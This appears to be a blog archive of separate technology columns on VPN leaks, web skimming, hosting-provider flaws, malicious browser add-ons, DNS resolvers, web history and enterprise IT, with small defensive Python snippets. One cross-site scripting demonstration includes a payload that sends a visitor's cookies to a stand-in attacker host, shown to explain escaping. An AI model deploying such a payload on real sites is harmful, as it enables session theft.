Network Solutions blog: How to Prevent a Data Leak within VPN Environments

Using a Virtual Private Network (VPN) to connect your laptop when you aren’t in the office is one of the first things most remote workers learn. And given that many of us haven’t set foot in our offices for months, using a VPN is now ingrained in our daily computer usage. But as VPNs have grown more popular, they have also become harder to keep secure. Various reports document that private data from more than 20 million users has been leaked because of poorly implemented VPNs, including email passwords and home addresses.

In this post for Network Solutions’ blog, I discuss ways to prevent data leaks from happening and to better secure your VPNs, along with links to the most trusted reviewers of these products.

Network Solutions blog: How to defend against web skimming attacks

Your eCommerce website is vulnerable to a variety of threats known collectively as web skimming. The hackers behind these threats are getting better at penetrating your site and installing malware to steal your customers’ money and private information. And web skimming is becoming more common, with attacks growing in both frequency and the size of the data breaches they produce. In this post for Network Solutions’ blog, I describe how these attacks work, reference a few of the more newsworthy ones and provide a series of tips on how to prevent your own eCommerce site from being compromised.


The dangers of DreamHost and GoDaddy hosting

If you host your website on GoDaddy, DreamHost, Bluehost, HostGator, OVH or iPage, this blog post is for you. Chances are your site could be vulnerable to a bug or may have been deliberately infected with something you didn’t know about. Given that millions of websites are involved, this is a moderately big deal.

It used to be that finding a hosting provider was a matter of price and reliability. Now you have to check to see if the vendor actually knows what they are doing. In the past couple of days, I have seen stories such as this one about GoDaddy’s web hosting:


And then there is this post, which talks about the other hosting vendors:

Let’s take them one at a time. The GoDaddy issue has to do with its Real User Metrics module, which is used to track traffic to your site. In theory it is a good idea: who doesn’t like more metrics? However, the researcher Igor Kromin, who wrote the post, found that the JavaScript module GoDaddy uses is so poorly written that it measurably slowed his site’s performance. Before he published his findings, all GoDaddy hosting customers had these metrics enabled by default. Now GoDaddy has turned the module off by default and is looking at future improvements. Score one for progress.

Why is this a big deal? Supply-chain attacks happen all the time, often by inserting small snippets of JavaScript code into your pages. It is hard enough to trace their origins as it is, without your hosting provider adding scripts of its own as part of its services. I wrote about this issue here.
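As a quick illustration (my own sketch, not from the original post), here is a minimal Python example that fetches a page and lists every script source it references, flagging the ones served from other domains. The URL is a placeholder; point it at your own site, and any third-party script you don’t recognize deserves a closer look.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import urlopen

PAGE = "https://www.example.com/"   # placeholder: substitute your own site

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag on the page."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

html = urlopen(PAGE).read().decode("utf-8", errors="replace")
collector = ScriptCollector()
collector.feed(html)

site_host = urlparse(PAGE).netloc
for src in collector.sources:
    host = urlparse(src).netloc
    # Relative URLs have no netloc and count as same-origin.
    flag = "third-party" if host and host != site_host else "same-origin"
    print(f"{flag:12s} {src}")
```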

If you use GoDaddy hosting, you should go to your cPanel hosting portal, click on the small three dots at the top of the page (as shown above), click “help us” and ensure you have opted out.

Okay, moving on to the second article, about other hosting provider scripting vulnerabilities. Paulos Yibelo looked at several providers and found multiple issues that differed among them. The issues involved cross-site scripting, cross-site request forgery, man-in-the-middle problems, potential account takeovers and bypass attack vulnerabilities. The list is depressingly long, and Yibelo’s descriptions show each provider’s problems. “All of them are easily hacked,” he wrote. But what was more instructive was the responses he got from each hosting vendor. He also mentions that Bluehost terminated his account, presumably because they saw he was up to no good. “Good job, but a little too late,” he wrote.

Most of the providers were very responsive when reporters contacted them and said these issues have now been fixed. OVH hasn’t yet responded.

So the moral of the story? Don’t assume your provider knows everything, or even anything, about hosting your site, and be on the lookout for similar research. Find a smaller provider that can give you better customer service (I have been using EMWD.com for years and can’t recommend them enough). If you don’t know what some of these scripting attacks are or how they work, go on over to OWASP.org and educate yourself about their basics.
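For readers who want a concrete picture before heading over to OWASP, here is a tiny, hypothetical Python sketch of the cross-site scripting problem: the unsafe function drops user input straight into HTML, while the safe one escapes it first.

```python
import html

def render_comment_unsafe(user_input: str) -> str:
    # Vulnerable: user input is dropped straight into the page, so a
    # submitted "<script>...</script>" will execute in every visitor's browser.
    return f"<p>Latest comment: {user_input}</p>"

def render_comment_safe(user_input: str) -> str:
    # Escaping turns < > & and quotes into harmless entities first.
    return f"<p>Latest comment: {html.escape(user_input)}</p>"

payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(render_comment_unsafe(payload))   # the script tag survives intact
print(render_comment_safe(payload))     # rendered as inert text
```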

Watch that browser add-on

This is a story about how hard it is for normal folks to keep their computers secure. It is a depressing but instructive one. Most of us take for granted that when we bring up our web browser and go to a particular site, we are safe and what we see is malware-free. However, that isn’t always the case, and it is getting harder to be sure.

Many of you make use of browser add-ons for various things: right now I am running a bunch of them from Google, to view online documents and launch apps. One extension that I rely on is my password manager. I used to have a lot of other ones, but found that after the initial excitement (or whatever you want to call it, I know I live a sheltered life) wore off, I didn’t really take advantage of them.

So my story today is about an add-on called Web Security. It is oddly named, because it does anything but what it says. And this is the challenge for all of us: many add-ons and smartphone apps have misleading names, because their authors want you to think they are benign. Mozilla initially recommended this add-on earlier this month. Then it started getting complaints from users and security researchers. Turns out they made a big mistake. Web Security tracks what you are doing as you browse the Internet, and could compromise your computer. When Mozilla add-on analyst (that is his real job) Rob Wu looked into it further, he found some very nasty behavior that made it clear the add-on was hiding malicious code. Mozilla basically turned off the extension for the hundreds of thousands of users who had installed it and would have been vulnerable. This story on Bleeping Computer provides more details.

In the process of researching this one add-on’s behavior, Wu found 22 other add-ons that did something similar, and they were also disabled and removed from the add-on store. More than half a million Firefox users had at least one of these add-ons installed.

So what can we learn from this tale of woe? One is the sobering thought that even security experts have trouble identifying badly behaving programs. Granted, this one was found and fixed quickly. But it does give me (and probably you too) pause.

Here are some suggestions. First off, take a look at your extensions. Each browser does this slightly differently. Cisco has a great post here to help you track them down in Chrome and IE11. Make sure you don’t have anything more than you really need to get your work done. Second, keep your browser version updated. Most modern browsers will warn you when it is time for an update; don’t tarry when you see that warning. Finally, be aware of anything odd when you bring up a web page: look closely at the URL and any popups that are displayed. Granted, this can get tedious, but you are ultimately safer.
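If you want a quick inventory without clicking through browser menus, the following Python sketch (my own rough approach; the profile paths are assumptions and vary by operating system and profile name) walks Chrome’s extensions folder and prints each extension’s manifest name and version.

```python
import json
from pathlib import Path

# Typical Chrome profile locations -- these paths are assumptions and may
# differ on your machine or for non-default profiles.
CANDIDATES = [
    Path.home() / ".config/google-chrome/Default/Extensions",                      # Linux
    Path.home() / "Library/Application Support/Google/Chrome/Default/Extensions",  # macOS
    Path.home() / "AppData/Local/Google/Chrome/User Data/Default/Extensions",      # Windows
]

for ext_dir in CANDIDATES:
    if not ext_dir.is_dir():
        continue
    print(f"Extensions found under {ext_dir}:")
    # Layout is Extensions/<extension-id>/<version>/manifest.json
    for manifest in ext_dir.glob("*/*/manifest.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue
        name = data.get("name", "(unnamed)")      # names like __MSG_...__ are
        version = data.get("version", "?")        # localized placeholders
        print(f"  {name}  v{version}")
```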

A new way to speed up your Internet connection

How often do you comment on how slow the Internet is? Now you have a chance to do something to speed it up. Before I tell you, I have to backtrack a bit.

Most of us don’t give a second thought to the Domain Name System (DNS) or how it works to translate “google.com” into its numerical IP address. But that work behind the scenes can make the difference between having and not having access to your favorite websites. I explain how the DNS works in this article I wrote ten years ago for PC World.
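To make that translation step concrete, here is a tiny Python example (my own illustration, not from the PC World article) that asks your operating system’s resolver to turn a host name into its numerical addresses:

```python
import socket

# Ask the system resolver for the addresses behind a host name.
for family, _, _, _, sockaddr in socket.getaddrinfo("google.com", 443, proto=socket.IPPROTO_TCP):
    label = "IPv6" if family == socket.AF_INET6 else "IPv4"
    print(f"{label}: {sockaddr[0]}")
```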

Back when I wrote that article, there was a growing need for providing better DNS services that were more secure and more private than the default one that comes with your broadband provider. But one of the great things about the Internet is that you usually have lots of choices for something that you are trying to do. Don’t like your hosting provider? Nowadays there are hundreds. Want to find a better server for some particular task? Now everything is in the cloud, and you have your choice of clouds. And so forth.

And now there are various ways to get DNS to your little patch of cyberspace, with the introduction of a free service from Cloudflare. If you haven’t heard of them before, Cloudflare has built an impressive collection of Internet infrastructure around the world, to deliver webpages and other content as quickly as possible, no matter where you are and where the website you are trying to reach is located. If you think about that for a moment, you will realize how difficult a job that is. Given the global reach of the Internet, and how many people are trying to block particular pieces of it (think China, Saudi Arabia, and so forth), you begin to see the scope and achievement of what they have done.

I wanted to test the new 1.1.1.1 DNS service, but I didn’t have the time to do a thorough job. Now Nykolas has done it for me in this post on Medium. He has something of a DNS testing fetish, which is good, because he has collected a lot of great information that can help you decide whether to switch to another DNS provider.

There are these five “legacy” DNS providers that have been operating for years:

  • Google 8.8.8.8: Private and unfiltered. The most popular option and, until now, the easiest DNS address to remember. Its IP address was spray-painted on Turkish buildings (as shown above) during one attempt by the Turkish government to block Internet access.
  • OpenDNS 208.67.222.222: Bought by Cisco, they supposedly block malicious domains and offer the option to block adult content.
  • Norton DNS 199.85.126.20: They supposedly block malicious domains and integrate with their Antivirus.
  • Yandex DNS 77.88.8.7: A Russian service that supposedly blocks malicious domains.
  • Comodo DNS 8.26.56.26: They supposedly block malicious domains.

I have used Google, OpenDNS and Comodo over the years in various places and on various pieces of equipment. As an early tester of OpenDNS, I had some problems that I document here on my blog back in 2012.

Then there are the new kids on the block:

  • CleanBrowsing 185.228.168.168: Private and security aware. Supposedly blocks access to adult content.
  • CloudFlare 1.1.1.1: Private and unfiltered, and just recently announced.
  • Quad9 9.9.9.9: Private and security aware. Supposedly blocks access to malicious domains, based in NYC and part of the NYCSecure project.

How do they all stack up? Nykolas put together this handy feature chart, and you can read his post with the details:

As I mentioned earlier, he did a very thorough job testing the DNS providers from around the globe, using VPNs to connect to their services from 17 different locations. He found that all of the providers performed well across North America and Europe, but elsewhere in the world there were differences. Overall though, CloudFlare was the fastest DNS for 72% of all the locations, with an amazingly low average of 5 ms across the globe. When you think about that figure, it is pretty darn fast. I have seen network latency from one end of my cable network to the other that is many times that.
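You can get a rough feel for this kind of testing yourself. The sketch below (my own, far cruder than Nykolas’s methodology) hand-builds a minimal DNS query and times the round trip to a few of the resolvers listed above; run it from different networks and the latency differences show up quickly.

```python
import random
import socket
import struct
import time

def dns_query_time(server, name, timeout=2.0):
    """Send a minimal A-record query to `server` and return the round trip in milliseconds."""
    txid = random.randint(0, 0xFFFF)
    # Header: ID, flags (0x0100 = recursion desired), QDCOUNT=1, AN/NS/ARCOUNT=0
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    # Question: length-prefixed labels, terminating zero, QTYPE=A, QCLASS=IN
    question = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    question += struct.pack(">HH", 1, 1)
    packet = header + question

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        start = time.perf_counter()
        s.sendto(packet, (server, 53))
        s.recvfrom(512)
        return (time.perf_counter() - start) * 1000.0

resolvers = {
    "Cloudflare": "1.1.1.1",
    "Google": "8.8.8.8",
    "Quad9": "9.9.9.9",
    "OpenDNS": "208.67.222.222",
}
for label, ip in resolvers.items():
    try:
        print(f"{label:12s} {dns_query_time(ip, 'example.com'):6.1f} ms")
    except socket.timeout:
        print(f"{label:12s} timed out")
```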

So why in my commentary above do I say “supposedly”? Well, because they don’t really block malware. In another Medium post, he compared the various DNS providers’ security filters and found that many of the malware-infested sites he tested weren’t blocked by any of the providers. Granted, he couldn’t test every piece of malware, but he did test dozens of samples, some new and some old. He found that Google’s “safe browsing” feature did a better job of blocking malicious content at the individual browser level than any of these DNS providers did at the network level.
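If you want to spot-check the “supposedly” yourself, one rough approach is to resolve a domain you already know is flagged as malicious through both a filtering resolver and an unfiltered one, then compare the answers. The sketch below assumes the third-party dnspython package and uses a placeholder domain; filtering resolvers typically answer with NXDOMAIN or a sinkhole address such as 0.0.0.0.

```python
import dns.exception
import dns.resolver  # third-party: pip install dnspython

# Placeholder -- substitute a domain you already know is on a blocklist.
TEST_DOMAIN = "known-bad.example"

RESOLVERS = {
    "Quad9 (filtering)": "9.9.9.9",
    "Cloudflare (unfiltered)": "1.1.1.1",
}

for label, ip in RESOLVERS.items():
    resolver = dns.resolver.Resolver(configure=False)
    resolver.nameservers = [ip]
    try:
        answers = resolver.resolve(TEST_DOMAIN, "A", lifetime=3)
        addresses = [a.to_text() for a in answers]
        verdict = "sinkholed" if "0.0.0.0" in addresses else "resolved"
        print(f"{label}: {verdict} -> {addresses}")
    except dns.resolver.NXDOMAIN:
        print(f"{label}: blocked (NXDOMAIN)")
    except (dns.resolver.NoAnswer, dns.resolver.NoNameservers, dns.exception.Timeout):
        print(f"{label}: no usable answer")
```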

Given these results, I will probably use the Cloudflare 1.1.1.1 DNS going forward. After all, it is an easy IP address to remember (Cloudflare worked with one of the regional Internet authorities, which has owned that address since the dawn of time), it works well, and I like the motivation behind it, as they stated on their blog: “We don’t want to know what you do on the Internet—it’s none of our business—and we’ve taken the technical steps to ensure we can’t.”

One final caveat: speeding up DNS isn’t the only thing you can do to surf the web more quickly. There are many other roadblocks or speed bumps that can delay packets getting to your computer or phone. But it is a very easy way to gain performance, particularly if you rely on a solid infrastructure such as what Cloudflare is providing.

Looking back at 25 years of the world wide web

This week the web has celebrated yet another of its 25th birthdays, and boy does that make me feel old. Like many other great inventions, there are several key dates along the way in its origin story. For example, here is a copy of the original email that Tim Berners-Lee sent back in August 1991, along with an explanation of the context of that message. Steven Vaughan-Nichols has a nice walk down memory lane over at ZDnet here.

Back in 1995, I had some interesting thoughts about those early days of the web as well. This column draws on one that I wrote then, with some current day updates.

I’ve often said that web technology is a lot like radio in the 1920s: station owners are not too sure who is really listening but they are signing up advertisers like crazy, programmers are still feeling around for the best broadcast mechanisms, and fast-changing standards make for lots of shaky technology that barely works on the best of days. Movies, obviously, are the metaphor for Java and audio applets and other non-textual additions.

So far, I think the best metaphor for the web is that of a book: something that you’d like to have as a reference source, entertaining when you need it, portable (well, if you tote around a laptop), and so full of information that you would rather leave it on your shelf.

Back in 1995, so-called “electronic books” were a big deal. One of my favorites then was a 1993 book/disk package called The Electronic Word by Richard Lanham, which, ironically, is about how computers have changed the face of written communications. The book is my favorite counter-example of on-line books. Lanham is an English professor at UCLA, and the book comes with a HyperCard stack that shows both the power of print and how unsatisfactory reading on the screen can be. Prof. Lanham takes you through some of the editing process in the HyperCard version, showing before-and-after passages that were included in the print version.

But we don’t all want to read stuff on-line, especially dry academic works that contain transcripts of speeches. That is an important design point for webmasters to consider. Many websites are full reference works, and even if we had faster connections to the Internet, we still wouldn’t want to view all that stuff on-screen. Send me a book, or some paper, instead.

Speaking of eliminating paper, in my column I took a look at what Byte magazine was trying to do with its Virtual Press Room. (The link will take you to a 1996 archive copy, where you can see the beginnings of what others would do later on. As with so many other things, Byte was far ahead of the curve.)

Byte back then had an intriguing idea: have vendors send their press releases electronically, so editors don’t have to plow through printed ones. But how about going a step further in the interest of saving trees: sending in both links to the vendor’s own website and whatever keywords are needed? Years later, I am still asking vendors for key information from their press releases. Some things don’t change, no matter what the technology.

What separates good books from bad is good indexing and a great table of contents. We use both in books to find our way around: the former more for reference, the latter more for determining interest and where to enter its pages. So how many websites have you visited lately that have either, and have done a reasonable job on both? Not many back in 1995, and not many today, sadly. Some things don’t change.

Today we almost take it for granted that numerous enterprise software products have web front-end interfaces, not to mention all the SaaS products that speak native HTML. But back in the mid 1990s, vendors were still struggling with the web interface and trying it on. Cisco had its UniverCD (shown here), which was part CD-ROM and part website. The CD came with a copy of the Mosaic browser so you could look up the latest router firmware and download it online, and when I saw this back in the day I said it was a brilliant use of the two interfaces. Novell (ah, remember them?) had its Market Messenger CD ROM, which also combined the two. There were lots of other book/CD combo packages back then, including Frontier’s Cybersearch product. It had the entire Lycos (a precursor of Google) catalog on CD along with browser and on-ramp tools. Imagine putting the entire index of the Internet on a single CD. Of course, it would be instantly out of date but you can’t fault them for trying.

The reason vendors combined CDs with the web was that bandwidth was precious and sending images down a dial-up line was painful. (Remember that the first web browser, shown at the top of this column, was text-only.) If you could offload those images onto a CD, you could have the best of both worlds. At the time, I said that if we wanted to watch movies, we would go to Blockbuster and rent one. Remember Blockbuster? Now we get annoyed if our favorite flick isn’t available to be streamed immediately online.

Yes, the web has come a long way since its invention, no matter which date you choose to celebrate. It has been an amazing time to be around and watch its progress, and I count myself lucky that I can use its technology to preserve many of the things that others and I have written about it.

Authentic8 whitepaper: Why a virtual browser is important for your enterprise

The web browser has become the de facto universal user application interface. It is the mechanism of choice for accessing modern software and services. But because of this ubiquity, browsers carry a heavier burden to handle security carefully.

Because more malware enters via the browser than through any other place on the typical network, enterprises are looking for alternatives to the standard browsers. In this white paper that I wrote for Authentic8, makers of the Silo browser (their admin console is shown here), I talk about some of the issues involved and the benefits of using virtual browsers. These tools offer sandboxing protection to keep malware and infections from reaching the endpoint computer. Web content never runs directly on the actual device being used to surf the web, so even if a session is infected, the damage can be more readily contained.

Why the original Soviet Internet failed

I am reminded of the Cold War today, with next week marking the 30th anniversary of the Chernobyl disaster. Leading up to that unfortunate event was a series of activities during the 1950s and 1960s in which we raced the Soviets to produce nuclear weapons, launch manned space vehicles, and create other new technologies. We were also in competition to develop the beginnings of the underlying technology for what would become today’s Internet.

One effort succeeded thanks to well-managed state subsidies and collaborative research that worked closely with a central planning authority. The other failed largely because of unregulated competition that was stymied by a variety of self-interests. Ironically, we acted like the socialists and the Soviets acted like the capitalists.

While the origins of the American Internet are well documented, until now there has been little published research into those early Soviet efforts. A new book from Benjamin Peters, a professor at the University of Tulsa, called How Not to Network a Nation seeks to rectify this. While a fairly dry read, it nevertheless is fascinating to see how the historical context unfolded and how the Soviets missed out on being at the forefront of Internet developments, despite early leads in rocketry and computer science.

It wasn’t from lack of effort. From the 1950s onward, a small group of Soviet scientists tried to develop a national computer network. They came close on three separate occasions, but failed each time. Meanwhile, the progenitor of the Internet, ARPANET, was established in late 1969 in the US, and that became the basis for the technology we use every day.

Ultimately the Soviet-style “command economy” proved inflexible and eventually imploded. Instead of delivering a utopian vision for the common man, it gave us quirky cars like the Lada and the Mir space station, which looked like something built out of spare parts.

The Soviets had trouble mainly because of a disconnect between their civilian and military economies. The military didn’t understand how to marshal and manage resources for civilian projects. And when it came time to deal with superstar scientists from its own army, the leadership faltered in deciding which proposed civilian projects to pursue.

Interestingly, those Soviet efforts at constructing the Internet could have become groundbreaking, had they moved forward. One was the precursor to cloud computing, another was an early digital computer. Both of these efforts were ultimately squashed by their bureaucracies, and you know how the story goes from there. What is more remarkable is that this early computer was Europe’s first, built in an old monastery that didn’t even have indoor plumbing.

Almost a year after ARPANET was created, the Soviets held a meeting to approve their own national computing network. Certainly, having the US ahead of them increased their interest. But they tabled the idea from Viktor Glushkov and it died in committee. It was bad timing: two of the leaders of the Politburo were absent the day the proposal was considered.

Another leading light was Anatoly Kitov, who proposed in 1959 that civilian economists use computers to solve economic problems. For his efforts, he was dismissed from the army and put through a show trial. Yet during the 1950s the Soviet military had long-distance computer networks and in the 1960s they had local area networks. What they didn’t have were standard protocols and interoperable computers. It wasn’t the technology, but the people, that stopped their development of these projects.

What Peters shows is that the lessons from the failed Soviet Internet (he adoringly calls it the “InterNyet”) have more to do with the underlying actors and the intended social consequences than with any lack of combined technical skill. Every step along the route he charts in his book shows that some failure of one or more organizations held the Soviet Internet back from flourishing as it did here in the States. Memos got lost in the mail, decisions were deferred, committees fought over jurisdiction, and so forth. These mundane reasons prevented the Soviet Internet from going anywhere.

You can pre-order the book from Amazon here.

The evolution of today’s enterprise applications

Enterprises are changing the way they deliver their services, build their enterprise IT architectures and select and deploy their computing systems. These changes are needed, not just to stay current with technology, but also to enable businesses to innovate and grow and surpass their competitors.

In the old days, corporate IT departments built networks and data centers that supported computing monocultures of servers, desktops and routers, all of which were owned, specified, and maintained by the company. Those days are over, and now how you deploy your technologies is critical, in what one writer calls “the post-cloud future.” Now we have companies that deliver their IT infrastructure completely from the cloud and don’t own much of anything. IT has moved to being more of a renter than a real estate baron. The raised-floor data center has given way to just a pipe connecting a corporation to the Internet. At the same time, the typical endpoint computing device has gone from a desktop or laptop computer to a tablet or smartphone, often purchased by the end user, who expects his or her IT department to support this choice. The actual device itself has become almost irrelevant, whatever its operating system and form factor.

At the same time, the typical enterprise application has evolved from something that was tested and assembled by an IT department to something that can readily be downloaded and installed at will. This frees IT departments from having to invest time in their “nanny state” approach in tracking which users are running what applications on which endpoints. Instead, they can use these staffers to improve their apps and benefit their business directly. The days when users had to wait on their IT departments to finish a requirements analysis study or go through a lengthy approvals process are firmly in the past. Today, users want their apps here and now. Forget about months: minutes count!

There are big implications for today’s IT departments. To make this new era of on-demand IT work, businesses have to change the way they deliver IT services. They need to make use of some if not all of the following elements:

  • Applications now have web front ends and can be accessed anywhere with a smartphone and a browser. This also means acknowledging that the workday is now 24×7, and users will work with whatever device, whenever and wherever they feel the most productive.
  • Applications have intuitive interfaces: no manuals or training should be necessary. Users don’t want to wait on their IT department for their apps to be activated, on-boarded, installed, or supported.
  • Network latency matters a lot. Users need the fastest possible response times and are going to be running their apps across the globe. IT has to design their Internet access accordingly.
  • Security is built into each app, rather than by defining and protecting a network perimeter.
  • IT staffs will have to evolve away from installing servers and towards managing integrations, provisioning services and negotiating vendor relationships. They will have to examine business processes from a wider lens and understand how their collection of apps will play in this new arena.


Network World: Five cloud costing tools reviewed

Certainly, using a cloud provider can be cheaper than purchasing your own hardware, or instrumental in moving a capital expense into an operating one. And there are impressive multi-core hyperscale servers that are now available to anyone for a reasonable monthly fee. But while it is great that cloud providers base their fees on what resources you actually consume, the various elements of your bill are daunting and complex, to say the least.

Separating pricing fact from fiction isn’t easy. For this article, we looked at five shopping comparison services: Cloudorado, CloudHarmony’s CloudSquare, CloudSpectator, Datapipe and RightScale’s PlanForCloud.com. Some of them cover a lot of providers, some only focus on a few.

You can read the full review in Network World today here.